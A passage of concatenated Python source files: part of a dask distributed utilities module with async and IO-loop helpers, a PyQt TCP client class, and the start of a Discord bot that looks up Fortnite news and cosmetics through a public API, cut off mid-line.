other task to watch them so that they are not orphaned """ for task in list(tasks._unfinished): try: yield task except quiet_exceptions: pass quiet() raise results[tasks.current_index] = result return results async def Any(args, quiet_exceptions=()): """Wait on many tasks at the same time and return when any is finished Err once any of the tasks err. Parameters ---------- args: futures to wait for quiet_exceptions: tuple, Exception Exception types to avoid logging if they fail """ tasks = gen.WaitIterator(*map(asyncio.ensure_future, args)) results = [None for _ in args] while not tasks.done(): try: result = await tasks.next() except Exception: @gen.coroutine def quiet(): """Watch unfinished tasks Otherwise if they err they get logged in a way that is hard to control. They need some other task to watch them so that they are not orphaned """ for task in list(tasks._unfinished): try: yield task except quiet_exceptions: pass quiet() raise results[tasks.current_index] = result break return results def sync(loop, func, *args, callback_timeout=None, **kwargs): """ Run coroutine in loop running in separate thread. 
""" callback_timeout = parse_timedelta(callback_timeout, "s") # Tornado's PollIOLoop doesn't raise when using closed, do it ourselves if PollIOLoop and ( (isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False)) or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed) ): raise RuntimeError("IOLoop is closed") try: if loop.asyncio_loop.is_closed(): # tornado 6 raise RuntimeError("IOLoop is closed") except AttributeError: pass e = threading.Event() main_tid = threading.get_ident() result = [None] error = [False] @gen.coroutine def f(): # We flag the thread state asynchronous, which will make sync() call # within `func` use async semantic. In order to support concurrent # calls to sync(), `asynchronous` is used as a ref counter. thread_state.asynchronous = getattr(thread_state, "asynchronous", 0) thread_state.asynchronous += 1 try: if main_tid == threading.get_ident(): raise RuntimeError("sync() called from thread of running loop") yield gen.moment future = func(*args, **kwargs) if callback_timeout is not None: future = asyncio.wait_for(future, callback_timeout) result[0] = yield future except Exception as exc: error[0] = sys.exc_info() finally: assert thread_state.asynchronous > 0 thread_state.asynchronous -= 1 e.set() loop.add_callback(f) if callback_timeout is not None: if not e.wait(callback_timeout): raise TimeoutError("timed out after %s s." % (callback_timeout,)) else: while not e.is_set(): e.wait(10) if error[0]: typ, exc, tb = error[0] raise exc.with_traceback(tb) else: return result[0] class LoopRunner: """ A helper to start and stop an IO loop in a controlled way. Several loop runners can associate safely to the same IO loop. Parameters ---------- loop: IOLoop (optional) If given, this loop will be re-used, otherwise an appropriate one will be looked up or created. asynchronous: boolean (optional, default False) If false (the default), the loop is meant to run in a separate thread and will be started if necessary. If true, the loop is meant to run in the thread this object is instantiated from, and will not be started automatically. """ # All loops currently associated to loop runners _all_loops = weakref.WeakKeyDictionary() _lock = threading.Lock() def __init__(self, loop=None, asynchronous=False): current = IOLoop.current() if loop is None: if asynchronous: self._loop = current else: # We're expecting the loop to run in another thread, # avoid re-using this thread's assigned loop self._loop = IOLoop() else: self._loop = loop self._asynchronous = asynchronous self._loop_thread = None self._started = False with self._lock: self._all_loops.setdefault(self._loop, (0, None)) def start(self): """ Start the IO loop if required. The loop is run in a dedicated thread. If the loop is already running, this method does nothing. 
""" with self._lock: self._start_unlocked() def _start_unlocked(self): assert not self._started count, real_runner = self._all_loops[self._loop] if self._asynchronous or real_runner is not None or count > 0: self._all_loops[self._loop] = count + 1, real_runner self._started = True return assert self._loop_thread is None assert count == 0 loop_evt = threading.Event() done_evt = threading.Event() in_thread = [None] start_exc = [None] def loop_cb(): in_thread[0] = threading.current_thread() loop_evt.set() def run_loop(loop=self._loop): loop.add_callback(loop_cb) try: loop.start() except Exception as e: start_exc[0] = e finally: done_evt.set() thread = threading.Thread(target=run_loop, name="IO loop") thread.daemon = True thread.start() loop_evt.wait(timeout=10) self._started = True actual_thread = in_thread[0] if actual_thread is not thread: # Loop already running in other thread (user-launched) done_evt.wait(5) if not isinstance(start_exc[0], RuntimeError): if not isinstance( start_exc[0], Exception ): # track down infrequent error raise TypeError("not an exception", start_exc[0]) raise start_exc[0] self._all_loops[self._loop] = count + 1, None else: assert start_exc[0] is None, start_exc self._loop_thread = thread self._all_loops[self._loop] = count + 1, self def stop(self, timeout=10): """ Stop and close the loop if it was created by us. Otherwise, just mark this object "stopped". """ with self._lock: self._stop_unlocked(timeout) def _stop_unlocked(self, timeout): if not self._started: return self._started = False count, real_runner = self._all_loops[self._loop] if count > 1: self._all_loops[self._loop] = count - 1, real_runner else: assert count == 1 del self._all_loops[self._loop] if real_runner is not None: real_runner._real_stop(timeout) def _real_stop(self, timeout): assert self._loop_thread is not None if self._loop_thread is not None: try: self._loop.add_callback(self._loop.stop) self._loop_thread.join(timeout=timeout) with suppress(KeyError): # IOLoop can be missing self._loop.close() finally: self._loop_thread = None def is_started(self): """ Return True between start() and stop() calls, False otherwise. """ return self._started def run_sync(self, func, *args, **kwargs): """ Convenience helper: start the loop if needed, run sync(func, *args, **kwargs), then stop the loop again. 
""" if self._started: return sync(self.loop, func, *args, **kwargs) else: self.start() try: return sync(self.loop, func, *args, **kwargs) finally: self.stop() @property def loop(self): return self._loop @contextmanager def set_thread_state(**kwargs): old = {} for k in kwargs: try: old[k] = getattr(thread_state, k) except AttributeError: pass for k, v in kwargs.items(): setattr(thread_state, k, v) try: yield finally: for k in kwargs: try: v = old[k] except KeyError: delattr(thread_state, k) else: setattr(thread_state, k, v) @contextmanager def tmp_text(filename, text): fn = os.path.join(tempfile.gettempdir(), filename) with open(fn, "w") as f: f.write(text) try: yield fn finally: if os.path.exists(fn): os.remove(fn) def clear_queue(q): while not q.empty(): q.get_nowait() def is_kernel(): """Determine if we're running within an IPython kernel >>> is_kernel() False """ # http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session if "IPython" not in sys.modules: # IPython hasn't been imported return False from IPython import get_ipython # check for `kernel` attribute on the IPython instance return getattr(get_ipython(), "kernel", None) is not None hex_pattern = re.compile("[a-f]+") @functools.lru_cache(100000) def key_split(s): """ >>> key_split('x') 'x' >>> key_split('x-1') 'x' >>> key_split('x-1-2-3') 'x' >>> key_split(('x-2', 1)) 'x' >>> key_split("('x-2', 1)") 'x' >>> key_split("('x', 1)") 'x' >>> key_split('hello-world-1') 'hello-world' >>> key_split(b'hello-world-1') 'hello-world' >>> key_split('ae05086432ca935f6eba409a8ecd4896') 'data' >>> key_split('<module.submodule.myclass object at 0xdaf372') 'myclass' >>> key_split(None) 'Other' >>> key_split('x-abcdefab') # ignores hex 'x' """ if type(s) is bytes: s = s.decode() if type(s) is tuple: s = s[0] try: words = s.split("-") if not words[0][0].isalpha(): result = words[0].split(",")[0].strip("'(\"") else: result = words[0] for word in words[1:]: if word.isalpha() and not ( len(word) == 8 and hex_pattern.match(word) is not None ): result += "-" + word else: break if len(result) == 32 and re.match(r"[a-f0-9]{32}", result): return "data" else: if result[0] == "<": result = result.strip("<>").split()[0].split(".")[-1] return result except Exception: return "Other" def key_split_group(x): """A more fine-grained version of key_split >>> key_split_group(('x-2', 1)) 'x-2' >>> key_split_group("('x-2', 1)") 'x-2' >>> key_split_group('ae05086432ca935f6eba409a8ecd4896') 'data' >>> key_split_group('<module.submodule.myclass object at 0xdaf372') 'myclass' >>> key_split_group('x') >>> key_split_group('x-1') """ typ = type(x) if typ is tuple: return x[0] elif typ is str: if x[0] == "(": return x.split(",", 1)[0].strip("()\"'") elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x): return "data" elif x[0] == "<": return x.strip("<>").split()[0].split(".")[-1] else: return key_split(x) elif typ is bytes: return key_split_group(x.decode()) else: return key_split(x) @contextmanager def log_errors(pdb=False): from .comm import CommClosedError try: yield except (CommClosedError, gen.Return): raise except Exception as e: try: logger.exception(e) except TypeError: # logger becomes None during process cleanup pass if pdb: import pdb pdb.set_trace() raise def silence_logging(level, root="distributed"): """ Change all StreamHandlers for the given logger to the given level """ if isinstance(level, str): level = getattr(logging, level.upper()) old = None logger = logging.getLogger(root) for handler in logger.handlers: if 
isinstance(handler, logging.StreamHandler): old = handler.level handler.setLevel(level) return old @toolz.memoize def ensure_ip(hostname): """Ensure that address is an IP address Examples -------- >>> ensure_ip('localhost') '127.0.0.1' >>> ensure_ip('123.123.123.123') # pass through IP addresses '123.123.123.123' """ # Prefer IPv4 over IPv6, for compatibility families = [socket.AF_INET, socket.AF_INET6] for fam in families: try: results = socket.getaddrinfo( hostname, 1234, fam, socket.SOCK_STREAM # dummy port number ) except socket.gaierror as e: exc = e else: return results[0][4][0] raise exc tblib.pickling_support.install() def get_traceback(): exc_type, exc_value, exc_traceback = sys.exc_info() bad = [ os.path.join("distributed", "worker"), os.path.join("distributed", "scheduler"), os.path.join("tornado", "gen.py"), os.path.join("concurrent", "futures"), ] while exc_traceback and any( b in exc_traceback.tb_frame.f_code.co_filename for b in bad ): exc_traceback = exc_traceback.tb_next return exc_traceback def truncate_exception(e, n=10000): """ Truncate exception to be about a certain length """ if len(str(e)) > n: try: return type(e)("Long error message", str(e)[:n]) except Exception: return Exception("Long error message", type(e), str(e)[:n]) else: return e def validate_key(k): """Validate a key as received on a stream.""" typ = type(k) if typ is not str and typ is not bytes: raise TypeError("Unexpected key type %s (value: %r)" % (typ, k)) def _maybe_complex(task): """ Possibly contains a nested task """ return ( istask(task) or type(task) is list and any(map(_maybe_complex, task)) or type(task) is dict and any(map(_maybe_complex, task.values())) ) def seek_delimiter(file, delimiter, blocksize): """Seek current file to next byte after a delimiter bytestring This seeks the file to the next byte following the delimiter. It does not return anything. Use ``file.tell()`` to see location afterwards. Parameters ---------- file: a file delimiter: bytes a delimiter like ``b'\n'`` or message sentinel blocksize: int Number of bytes to read from the file at once. """ if file.tell() == 0: return last = b"" while True: current = file.read(blocksize) if not current: return full = last + current try: i = full.index(delimiter) file.seek(file.tell() - (len(full) - i) + len(delimiter)) return except ValueError: pass last = full[-len(delimiter) :] def read_block(f, offset, length, delimiter=None): """Read a block of bytes from a file Parameters ---------- f: file File-like object supporting seek, read, tell, etc.. offset: int Byte offset to start read length: int Number of bytes to read delimiter: bytes (optional) Ensure reading starts and stops at delimiter bytestring If using the ``delimiter=`` keyword argument we ensure that the read starts and stops at delimiter boundaries that follow the locations ``offset`` and ``offset + length``. If ``offset`` is zero then we start at zero. The bytestring returned WILL include the terminating delimiter string. 
Examples -------- >>> from io import BytesIO # doctest: +SKIP >>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP >>> read_block(f, 0, 13) # doctest: +SKIP b'Alice, 100\\nBo' >>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP b'Alice, 100\\nBob, 200\\n' >>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP b'Bob, 200\\nCharlie, 300' """ if delimiter: f.seek(offset) seek_delimiter(f, delimiter, 2 ** 16) start = f.tell() length -= start - offset f.seek(start + length) seek_delimiter(f, delimiter, 2 ** 16) end = f.tell() offset = start length = end - start f.seek(offset) bytes = f.read(length) return bytes @contextmanager def tmpfile(extension=""): extension = "." + extension.lstrip(".") handle, filename = tempfile.mkstemp(extension) os.close(handle) os.remove(filename) yield filename if os.path.exists(filename): try: if os.path.isdir(filename): shutil.rmtree(filename) else: os.remove(filename) except OSError: # sometimes we can't remove a generated temp file pass def ensure_bytes(s): """Attempt to turn `s` into bytes. Parameters ---------- s : Any The object to be converted. Will correctly handled * str * bytes * objects implementing the buffer protocol (memoryview, ndarray, etc.) Returns ------- b : bytes Raises ------ TypeError When `s` cannot be converted Examples -------- >>> ensure_bytes('123') b'123' >>> ensure_bytes(b'123') b'123' """ if isinstance(s, bytes): return s elif hasattr(s, "encode"): return s.encode() else: try: return bytes(s) except Exception as e: raise TypeError( "Object %s is neither a bytes object nor has an encode method" % s ) from e def divide_n_among_bins(n, bins): """ >>> divide_n_among_bins(12, [1, 1]) [6, 6] >>> divide_n_among_bins(12, [1, 2]) [4, 8] >>> divide_n_among_bins(12, [1, 2, 1]) [3, 6, 3] >>> divide_n_among_bins(11, [1, 2, 1]) [2, 6, 3] >>> divide_n_among_bins(11, [.1, .2, .1]) [2, 6, 3] """ total = sum(bins) acc = 0.0 out = [] for b in bins: now = n / total * b + acc now, acc = divmod(now, 1) out.append(int(now)) return out def mean(seq): seq = list(seq) return sum(seq) / len(seq) if hasattr(sys, "is_finalizing"): def shutting_down(is_finalizing=sys.is_finalizing): return is_finalizing() else: _shutting_down = [False] def _at_shutdown(l=_shutting_down): l[0] = True def shutting_down(l=_shutting_down): return l[0] atexit.register(_at_shutdown) shutting_down.__doc__ = """ Whether the interpreter is currently shutting down. For use in finalizers, __del__ methods, and similar; it is advised to early bind this function rather than look it up when calling it, since at shutdown module globals may be cleared. """ def open_port(host=""): """Return a probably-open port There is a chance that this port will be taken by the operating system soon after returning from this function. 
""" # http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, 0)) s.listen(1) port = s.getsockname()[1] s.close() return port def import_file(path): """ Loads modules for a file (.py, .zip, .egg) """ directory, filename = os.path.split(path) name, ext = os.path.splitext(filename) names_to_import = [] tmp_python_path = None if ext in (".py",): # , '.pyc'): if directory not in sys.path: tmp_python_path = directory names_to_import.append(name) if ext == ".py": # Ensure that no pyc file will be reused cache_file = cache_from_source(path) with suppress(OSError): os.remove(cache_file) if ext in (".egg", ".zip", ".pyz"): if path not in sys.path: sys.path.insert(0, path) names = (mod_info.name for mod_info in pkgutil.iter_modules([path])) names_to_import.extend(names) loaded = [] if not names_to_import: logger.warning("Found nothing to import from %s", filename) else: importlib.invalidate_caches() if tmp_python_path is not None: sys.path.insert(0, tmp_python_path) try: for name in names_to_import: logger.info("Reload module %s from %s file", name, ext) loaded.append(importlib.reload(importlib.import_module(name))) finally: if tmp_python_path is not None: sys.path.remove(tmp_python_path) return loaded class itemgetter: """A picklable itemgetter. Examples -------- >>> data = [0, 1, 2] >>> get_1 = itemgetter(1) >>> get_1(data) 1 """ __slots__ = ("index",) def __init__(self, index): self.index = index def __call__(self, x): return x[self.index] def __reduce__(self): return (itemgetter, (self.index,)) def asciitable(columns, rows): """Formats an ascii table for given columns and rows. Parameters ---------- columns : list The column names rows : list of tuples The rows in the table. Each tuple must be the same length as ``columns``. """ rows = [tuple(str(i) for i in r) for r in rows] columns = tuple(str(i) for i in columns) widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns)) row_template = ("|" + (" %%-%ds |" * len(columns))) % widths header = row_template % tuple(columns) bar = "+%s+" % "+".join("-" * (w + 2) for w in widths) data = "\n".join(row_template % r for r in rows) return "\n".join([bar, header, bar, data, bar]) def nbytes(frame, _bytes_like=(bytes, bytearray)): """ Number of bytes of a frame or memoryview """ if isinstance(frame, _bytes_like): return len(frame) else: try: return frame.nbytes except AttributeError: return len(frame) def is_writeable(frame): """ Check whether frame is writeable Will return ``True`` if writeable, ``False`` if readonly, and ``None`` if undetermined. """ try: return not memoryview(frame).readonly except TypeError: return None @contextmanager def time_warn(duration, text): start = time() yield end = time() if end - start > duration: print("TIME WARNING", text, end - start) def json_load_robust(fn, load=json.load): """ Reads a JSON file from disk that may be being written as we read """ while not os.path.exists(fn): sleep(0.01) for i in range(10): try: with open(fn) as f: cfg = load(f) if cfg: return cfg except (ValueError, KeyError): # race with writing process pass sleep(0.1) class DequeHandler(logging.Handler): """ A logging.Handler that records records into a deque """ _instances = weakref.WeakSet() def __init__(self, *args, n=10000, **kwargs): self.deque = deque(maxlen=n) super().__init__(*args, **kwargs) self._instances.add(self) def emit(self, record): self.deque.append(record) def clear(self): """ Clear internal storage. 
""" self.deque.clear() @classmethod def clear_all_instances(cls): """ Clear the internal storage of all live DequeHandlers. """ for inst in list(cls._instances): inst.clear() def reset_logger_locks(): """Python 2's logger's locks don't survive a fork event https://github.com/dask/distributed/issues/1491 """ for name in logging.Logger.manager.loggerDict.keys(): for handler in logging.getLogger(name).handlers: handler.createLock() is_server_extension = False if "notebook" in sys.modules: import traitlets from notebook.notebookapp import NotebookApp is_server_extension = traitlets.config.Application.initialized() and isinstance( traitlets.config.Application.instance(), NotebookApp ) if not is_server_extension: is_kernel_and_no_running_loop = False if is_kernel(): try: get_running_loop() except RuntimeError: is_kernel_and_no_running_loop = True if not is_kernel_and_no_running_loop: # TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below, # once tornado > 6.0.3 is available. if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"): # WindowsProactorEventLoopPolicy is not compatible with tornado 6 # fallback to the pre-3.8 default of Selector # https://github.com/tornadoweb/tornado/issues/2608 BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy else: BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy class AnyThreadEventLoopPolicy(BaseEventLoopPolicy): def get_event_loop(self): try: return super().get_event_loop() except (RuntimeError, AssertionError): loop = self.new_event_loop() self.set_event_loop(loop) return loop asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy()) @functools.lru_cache(1000) def has_keyword(func, keyword): return keyword in inspect.signature(func).parameters @functools.lru_cache(1000) def command_has_keyword(cmd, k): if cmd is not None: if isinstance(cmd, str): try: from importlib import import_module cmd = import_module(cmd) except ImportError: raise ImportError("Module for command %s is not available" % cmd) if isinstance(getattr(cmd, "main"), click.core.Command): cmd = cmd.main if isinstance(cmd, click.core.Command): cmd_params = set( [ p.human_readable_name for p in cmd.params if isinstance(p, click.core.Option) ] ) return k in cmd_params return False # from bokeh.palettes import viridis # palette = viridis(18) palette = [ "#440154", "#471669", "#472A79", "#433C84", "#3C4D8A", "#355D8C", "#2E6C8E", "#287A8E", "#23898D", "#1E978A", "#20A585", "#2EB27C", "#45BF6F", "#64CB5D", "#88D547", "#AFDC2E", "#D7E219", "#FDE724", ] @toolz.memoize def color_of(x, palette=palette): h = md5(str(x).encode()) n = int(h.hexdigest()[:8], 16) return palette[n % len(palette)] @functools.lru_cache(None) def iscoroutinefunction(f): return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f) @contextmanager def warn_on_duration(duration, msg): start = time() yield stop = time() if stop - start > parse_timedelta(duration): warnings.warn(msg, stacklevel=2) def typename(typ): """Return name of type Examples -------- >>> from distributed import Scheduler >>> typename(Scheduler) 'distributed.scheduler.Scheduler' """ try: return typ.__module__ + "." 
+ typ.__name__ except AttributeError: return str(typ) def format_dashboard_link(host, port): template = dask.config.get("distributed.dashboard.link") if dask.config.get("distributed.scheduler.dashboard.tls.cert"): scheme = "https" else: scheme = "http" return template.format( **toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port)) ) def parse_ports(port): """Parse input port information into list of ports Parameters ---------- port : int, str, None Input port or ports. Can be an integer like 8787, a string for a single port like "8787", a string for a sequential range of ports like "8000:8200", or None. Returns ------- ports : list List of ports Examples -------- A single port can be specified using an integer: >>> parse_ports(8787) >>> [8787] or a string: >>> parse_ports("8787") >>> [8787] A sequential range of ports can be specified by a string which indicates the first and last ports which should be included in the sequence of ports: >>> parse_ports("8787:8790") >>> [8787, 8788, 8789, 8790] An input of ``None`` is also valid and can be used to indicate that no port has been specified: >>> parse_ports(None) >>> [None] """ if isinstance(port, str) and ":" not in port: port = int(port) if isinstance(port, (int, type(None))): ports = [port] else: port_start, port_stop = map(int, port.split(":")) if port_stop <= port_start: raise ValueError( "When specifying a range of ports like port_start:port_stop, " "port_stop must be greater than port_start, but got " f"port_start={port_start} and port_stop={port_stop}" ) ports = list(range(port_start, port_stop + 1)) return ports is_coroutine_function = iscoroutinefunction class Log(str): """ A container for logs """ def _repr_html_(self): return "<pre><code>\n{log}\n</code></pre>".format( log=html.escape(self.rstrip()) ) class Logs(dict): """ A container for multiple logs """ def _repr_html_(self): summaries = [ "<details>\n" "<summary style='display:list-item'>{title}</summary>\n" "{log}\n" "</details>".format(title=title, log=log._repr_html_()) for title, log in sorted(self.items()) ] return "\n".join(summaries) def cli_keywords(d: dict, cls=None, cmd=None): """Convert a kwargs dictionary into a list of CLI keywords Parameters ---------- d : dict The keywords to convert cls : callable The callable that consumes these terms to check them for validity cmd : string or object A string with the name of a module, or the module containing a click-generated command with a "main" function, or the function itself. It may be used to parse a module's custom arguments (i.e., arguments that are not part of Worker class), such as nprocs from dask-worker CLI or enable_nvlink from dask-cuda-worker CLI. Examples -------- >>> cli_keywords({"x": 123, "save_file": "foo.txt"}) ['--x', '123', '--save-file', 'foo.txt'] >>> from dask.distributed import Worker >>> cli_keywords({"x": 123}, Worker) Traceback (most recent call last): ... 
ValueError: Class distributed.worker.Worker does not support keyword x """ if cls or cmd: for k in d: if not has_keyword(cls, k) and not command_has_keyword(cmd, k): if cls and cmd: raise ValueError( "Neither class %s or module %s support keyword %s" % (typename(cls), typename(cmd), k) ) elif cls: raise ValueError( "Class %s does not support keyword %s" % (typename(cls), k) ) else: raise ValueError( "Module %s does not support keyword %s" % (typename(cmd), k) ) def convert_value(v): out = str(v) if " " in out and "'" not in out and '"' not in out: out = '"' + out + '"' return out return sum( [["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], [] ) def is_valid_xml(text): return xml.etree.ElementTree.fromstring(text) is not None _offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload") weakref.finalize(_offload_executor, _offload_executor.shutdown) def import_term(name: str): """Return the fully qualified term Examples -------- >>> import_term("math.sin") <function math.sin(x, /)> """ try: module_name, attr_name = name.rsplit(".", 1) except ValueError: return importlib.import_module(name) module = importlib.import_module(module_name) return getattr(module, attr_name) async def offload(fn, *args, **kwargs): loop = asyncio.get_event_loop() return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs)) def serialize_for_cli(data): """Serialize data into a string that can be passthrough cli Parameters ---------- data : json-serializable object The data to serialize Returns ------- serialized_data : str The serialized data as a string """ return base64.urlsafe_b64encode(json.dumps(data).encode()).decode() def deserialize_for_cli(data): """De-serialize data into the original object Parameters ---------- data : str String serialied by serialize_for_cli() Returns ------- deserialized_data : obj The de-serialized data """ return json.loads(base64.urlsafe_b64decode(data.encode()).decode()) class EmptyContext: def __enter__(self): pass def __exit__(self, *args): pass async def __aenter__(self): pass async def __aexit__(self, *args): pass empty_context = EmptyContext() class LRU(UserDict): """Limited size mapping, evicting the least recently looked-up key when full""" def __init__(self, maxsize): super().__init__() self.data = OrderedDict() self.maxsize = maxsize def __getitem__(self, key): value = super().__getitem__(key) self.data.move_to_end(key) return value def __setitem__(self, key, value): if len(self) >= self.maxsize: self.data.popitem(last=False) super().__setitem__(key, value) def clean_dashboard_address(addr, default_listen_ip=""): """ Examples -------- >>> clean_dashboard_address(8787) {'address': '', 'port': 8787} >>> clean_dashboard_address(":8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("foo:8787") {'address': 'foo', 'port': 8787} """ if default_listen_ip == "0.0.0.0": default_listen_ip = "" # for IPV6 try: addr = int(addr) except (TypeError, ValueError): pass if isinstance(addr, str): addr = addr.split(":") if isinstance(addr, (tuple, list)): if len(addr) == 2: host, port = (addr[0], int(addr[1])) elif len(addr) == 1: [host], port = addr, 0 else: raise ValueError(addr) elif isinstance(addr, int): host = default_listen_ip port = addr return {"address": host, "port": port}
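# Usage sketch (illustrative, not part of the module above): exercises a few of
# the helpers defined in utils.py, assuming it is importable as
# ``distributed.utils``. Expected values follow the docstrings above.
from distributed.utils import LRU, key_split, parse_ports

# key_split() reduces a task key to its group prefix.
assert key_split("x-1-2-3") == "x"

# parse_ports() expands a "start:stop" string into an inclusive list of ports.
assert parse_ports("8787:8790") == [8787, 8788, 8789, 8790]

# LRU evicts the least recently looked-up key once maxsize is exceeded.
cache = LRU(maxsize=2)
cache["a"] = 1
cache["b"] = 2
cache["a"]       # touch "a" so that "b" becomes the eviction candidate
cache["c"] = 3   # inserting a third key evicts "b"
assert "b" not in cache and "a" in cache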
tcp_media.py
# encoding:utf-8
from .media import Media, MediaText
import socket
from queue import Queue
from threading import Thread
from tools.converter import str2bytearray
from PyQt5.QtCore import QTimer, pyqtSignal


def receive_from_socket(tcp_media):
    while tcp_media.receiving:
        data = tcp_media.socket.recv(1)
        tcp_media.rcv_queue.put(data)


class TCPMedia(Media):
    def __init__(self):
        super(TCPMedia, self).__init__(self._get_all_options())
        self.socket = None
        self.read_timer = QTimer()
        self.read_timer.timeout.connect(self._receive)
        self.read_timer.start(10)
        self.rcv_queue = Queue()
        self.receiving = True
        self.rcv_thread = None

    def is_open(self):
        return self.socket

    def open(self):
        if self.socket is None:
            selected_options = self.get_selected_options()
            selected_options["timeout"] = 0
            try:
                self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                self.socket.connect((selected_options["IP"], int(selected_options["PORT"])))
                self.receiving = True
                self.rcv_thread = Thread(target=receive_from_socket, args=(self,))
                self.rcv_thread.start()
            except socket.error as e:
                print("error happened", e)
                self.refresh_media_options()
                return False
        return True

    def _get_all_options(self):
        options = list()
        options.append(MediaText("IP", "127.0.0.1"))
        options.append(MediaText("PORT", "8266", u"端口号"))  # label: "Port number"
        return options

    def refresh_media_options(self):
        self.media_options = self._get_all_options()
        self.load_saved_options()

    def close(self):
        if self.socket is not None:
            self.socket.close()
        if self.rcv_thread is not None and self.rcv_thread.is_alive():
            self.receiving = False
            self.rcv_thread.join()

    def send(self, data):
        self.socket.send(data)

    def _receive(self):
        data = bytes([])
        while not self.rcv_queue.empty():
            data += self.rcv_queue.get()
        if len(data) > 0:
            self.data_ready.emit(data)

    def set_media_options(self, options):
        self.read_timer.stop()
        super(TCPMedia, self).set_media_options(options)
        if self.socket is not None:
            self.socket.close()
            self.socket = None
        is_open = self.open()
        self.read_timer.start(10)
        return is_open


if __name__ == "__main__":
    import json
    serial = TCPMedia()
    print(json.dumps(serial.get_media_options(), ensure_ascii=False))
main.py
# Fortnite-Api-Discord github.com/BayGamerYT/Fortnite-Api-Discord | Coding UTF-8 print('Fortnite-Api-Discord | Made by BayGamerYT') import json, os def data(): with open('config.json', 'r', encoding='utf-8') as f: return json.load(f) def text(): try: with open(f'lang/{data()["bot_lang"]}.json', 'r', encoding='utf-8') as f: return json.load(f) except: print('Invalid lang in settings') exit() try: from discord.ext import commands from threading import Thread from flask import Flask import requests import aiohttp import discord except: print(text()['module_not_found_error']) exit() response_lang = 'en' if data()['Response lang'] == '' else data()['Response lang'] request_lang = 'en' if data()['Search lang'] == '' else data()['Search lang'] T = os.getenv('Token') if data()['Token'] == 'ENV' else data()['Token'] bot = commands.Bot(command_prefix=data()['Prefix']) app=Flask("") @app.route("/") def index(): return "Running" @bot.event async def on_ready(): print('\n' + text()['bot_ready']) print(text()['name'] + f': {bot.user.name}#{bot.user.discriminator}') print(f'ID: {bot.user.id}\n') Thread(target=app.run,args=("0.0.0.0",8080)).start() @bot.command(pass_context=True) async def brnews(ctx, l = None): res_lang = response_lang if l == None: res_lang = response_lang response = requests.get(f'https://fortnite-api.com/v2/news/br?language={res_lang}') geted = response.json() if response.status_code == 200: image = geted['data']['image'] embed = discord.Embed(title=text()['br_news']) embed.set_image(url=image) await ctx.send(embed=embed) elif response.status_code == 400: error = geted['error'] embed = discord.Embed(title='Error', description=f'`{error}`') await ctx.send(embed=embed) elif response.status_code == 404: error =geted['error'] embed = discord.Embed(title='Error', description=f'``{error}``') await ctx.send(embed=embed) def color(value): if value == 'legendary': return 0xf0b132 elif value == 'epic': return 0x9d4dbb elif value == 'rare': return 0x0086FF elif value == 'uncommon': return 0x65b851 elif value == 'common': return 0x575757 elif value == 'icon': return 0x00FFFF elif value == 'marvel': return 0xED1D24 elif value == 'shadow': return 0x292929 elif value == 'dc': return 0x2b3147 elif value == 'slurp': return 0x09E0F0 elif value == 'dark': return 0xFF00FF elif value == 'frozen': return 0x93F7F6 elif value == 'lava': return 0xF55F35 elif value == 'starwars': return 0xCCCC00 else: return 0xffffff @bot.command(pass_context=True) async def item(ctx, *args): joinedArgs = ('+'.join(args)) if args != None: response = requests.get(f'https://fortnite-api.com/v2/cosmetics/br/search/all?name={joinedArgs}&matchMethod=starts&language={response_lang}&searchLanguage={request_lang}') geted = response.json() if response.status_code == 200: embed_count=0 item_left_count=0 for item in geted['data']: if embed_count != data()['Max_Search_Results']: embed_count+=1 item_id = item['id'] item_name = item['name'] item_description = item['description'] item_icon = item['images']['icon'] item_introduction = item['introduction']['text'] item_rarity = item['rarity']['displayValue'] if item['set'] == None: item_set = text()['none'] else: item_set = item['set']['text'] name = text()['name'] desc = text()['description'] intro = text()['introduction'] of_set = text()['set'] txt_id = text()['id'] rarity = text()['rarity'] embed = discord.Embed(title=f'{item_name}', color=color(item['rarity']['value'])) embed.add_field(name=desc, value=f'`{item_description}`') embed.add_field(name=txt_id, value=f'`{item_id}`') 
embed.add_field(name=intro, value=f'`{item_introduction}`') embed.add_field(name=of_set, value=f'`{item_set}`') embed.add_field(name=rarity, value=f'`{item_rarity}`') embed.set_thumbnail(url=item_icon) await ctx.send(embed=embed) else: item_left_count+=1 if item_left_count: max_srch = data()['Max_Search_Results'] mx_txt = text()['max_results_exceed_text'] await ctx.send(mx_txt.format(item_left_count, max_srch)) elif response.status_code == 400: error = geted['error'] embed = discord.Embed(title='Error', description=f'``{error}``') await ctx.send(embed=embed) elif response.status_code == 404: error = geted['error'] embed = discord.Embed(title='Error', description=f'``{error}``') await ctx.send(embed=embed) @bot.command(pass_context=True) async def cc(ctx, code = None): if code != None: response = requests.get(f'https://fortnite-api.com/v2/creatorcode?name={code}') geted = response.json() if response.status_code == 200: codeAcc =geted['data']['account']['name'] codeAccID =geted['data']['account']['id'] codestatus =geted['data']['status'] codeverified =geted['data']['verified'] code = text()['code'] account = text()['account'] text_id = text()['id'] active = text()['active'] inactive = text()['inactive'] verified_bool = text()['verified_bool'] account_id = text()['account_id'] yes = text()['text_yes'] no = text()['text_no'] status = 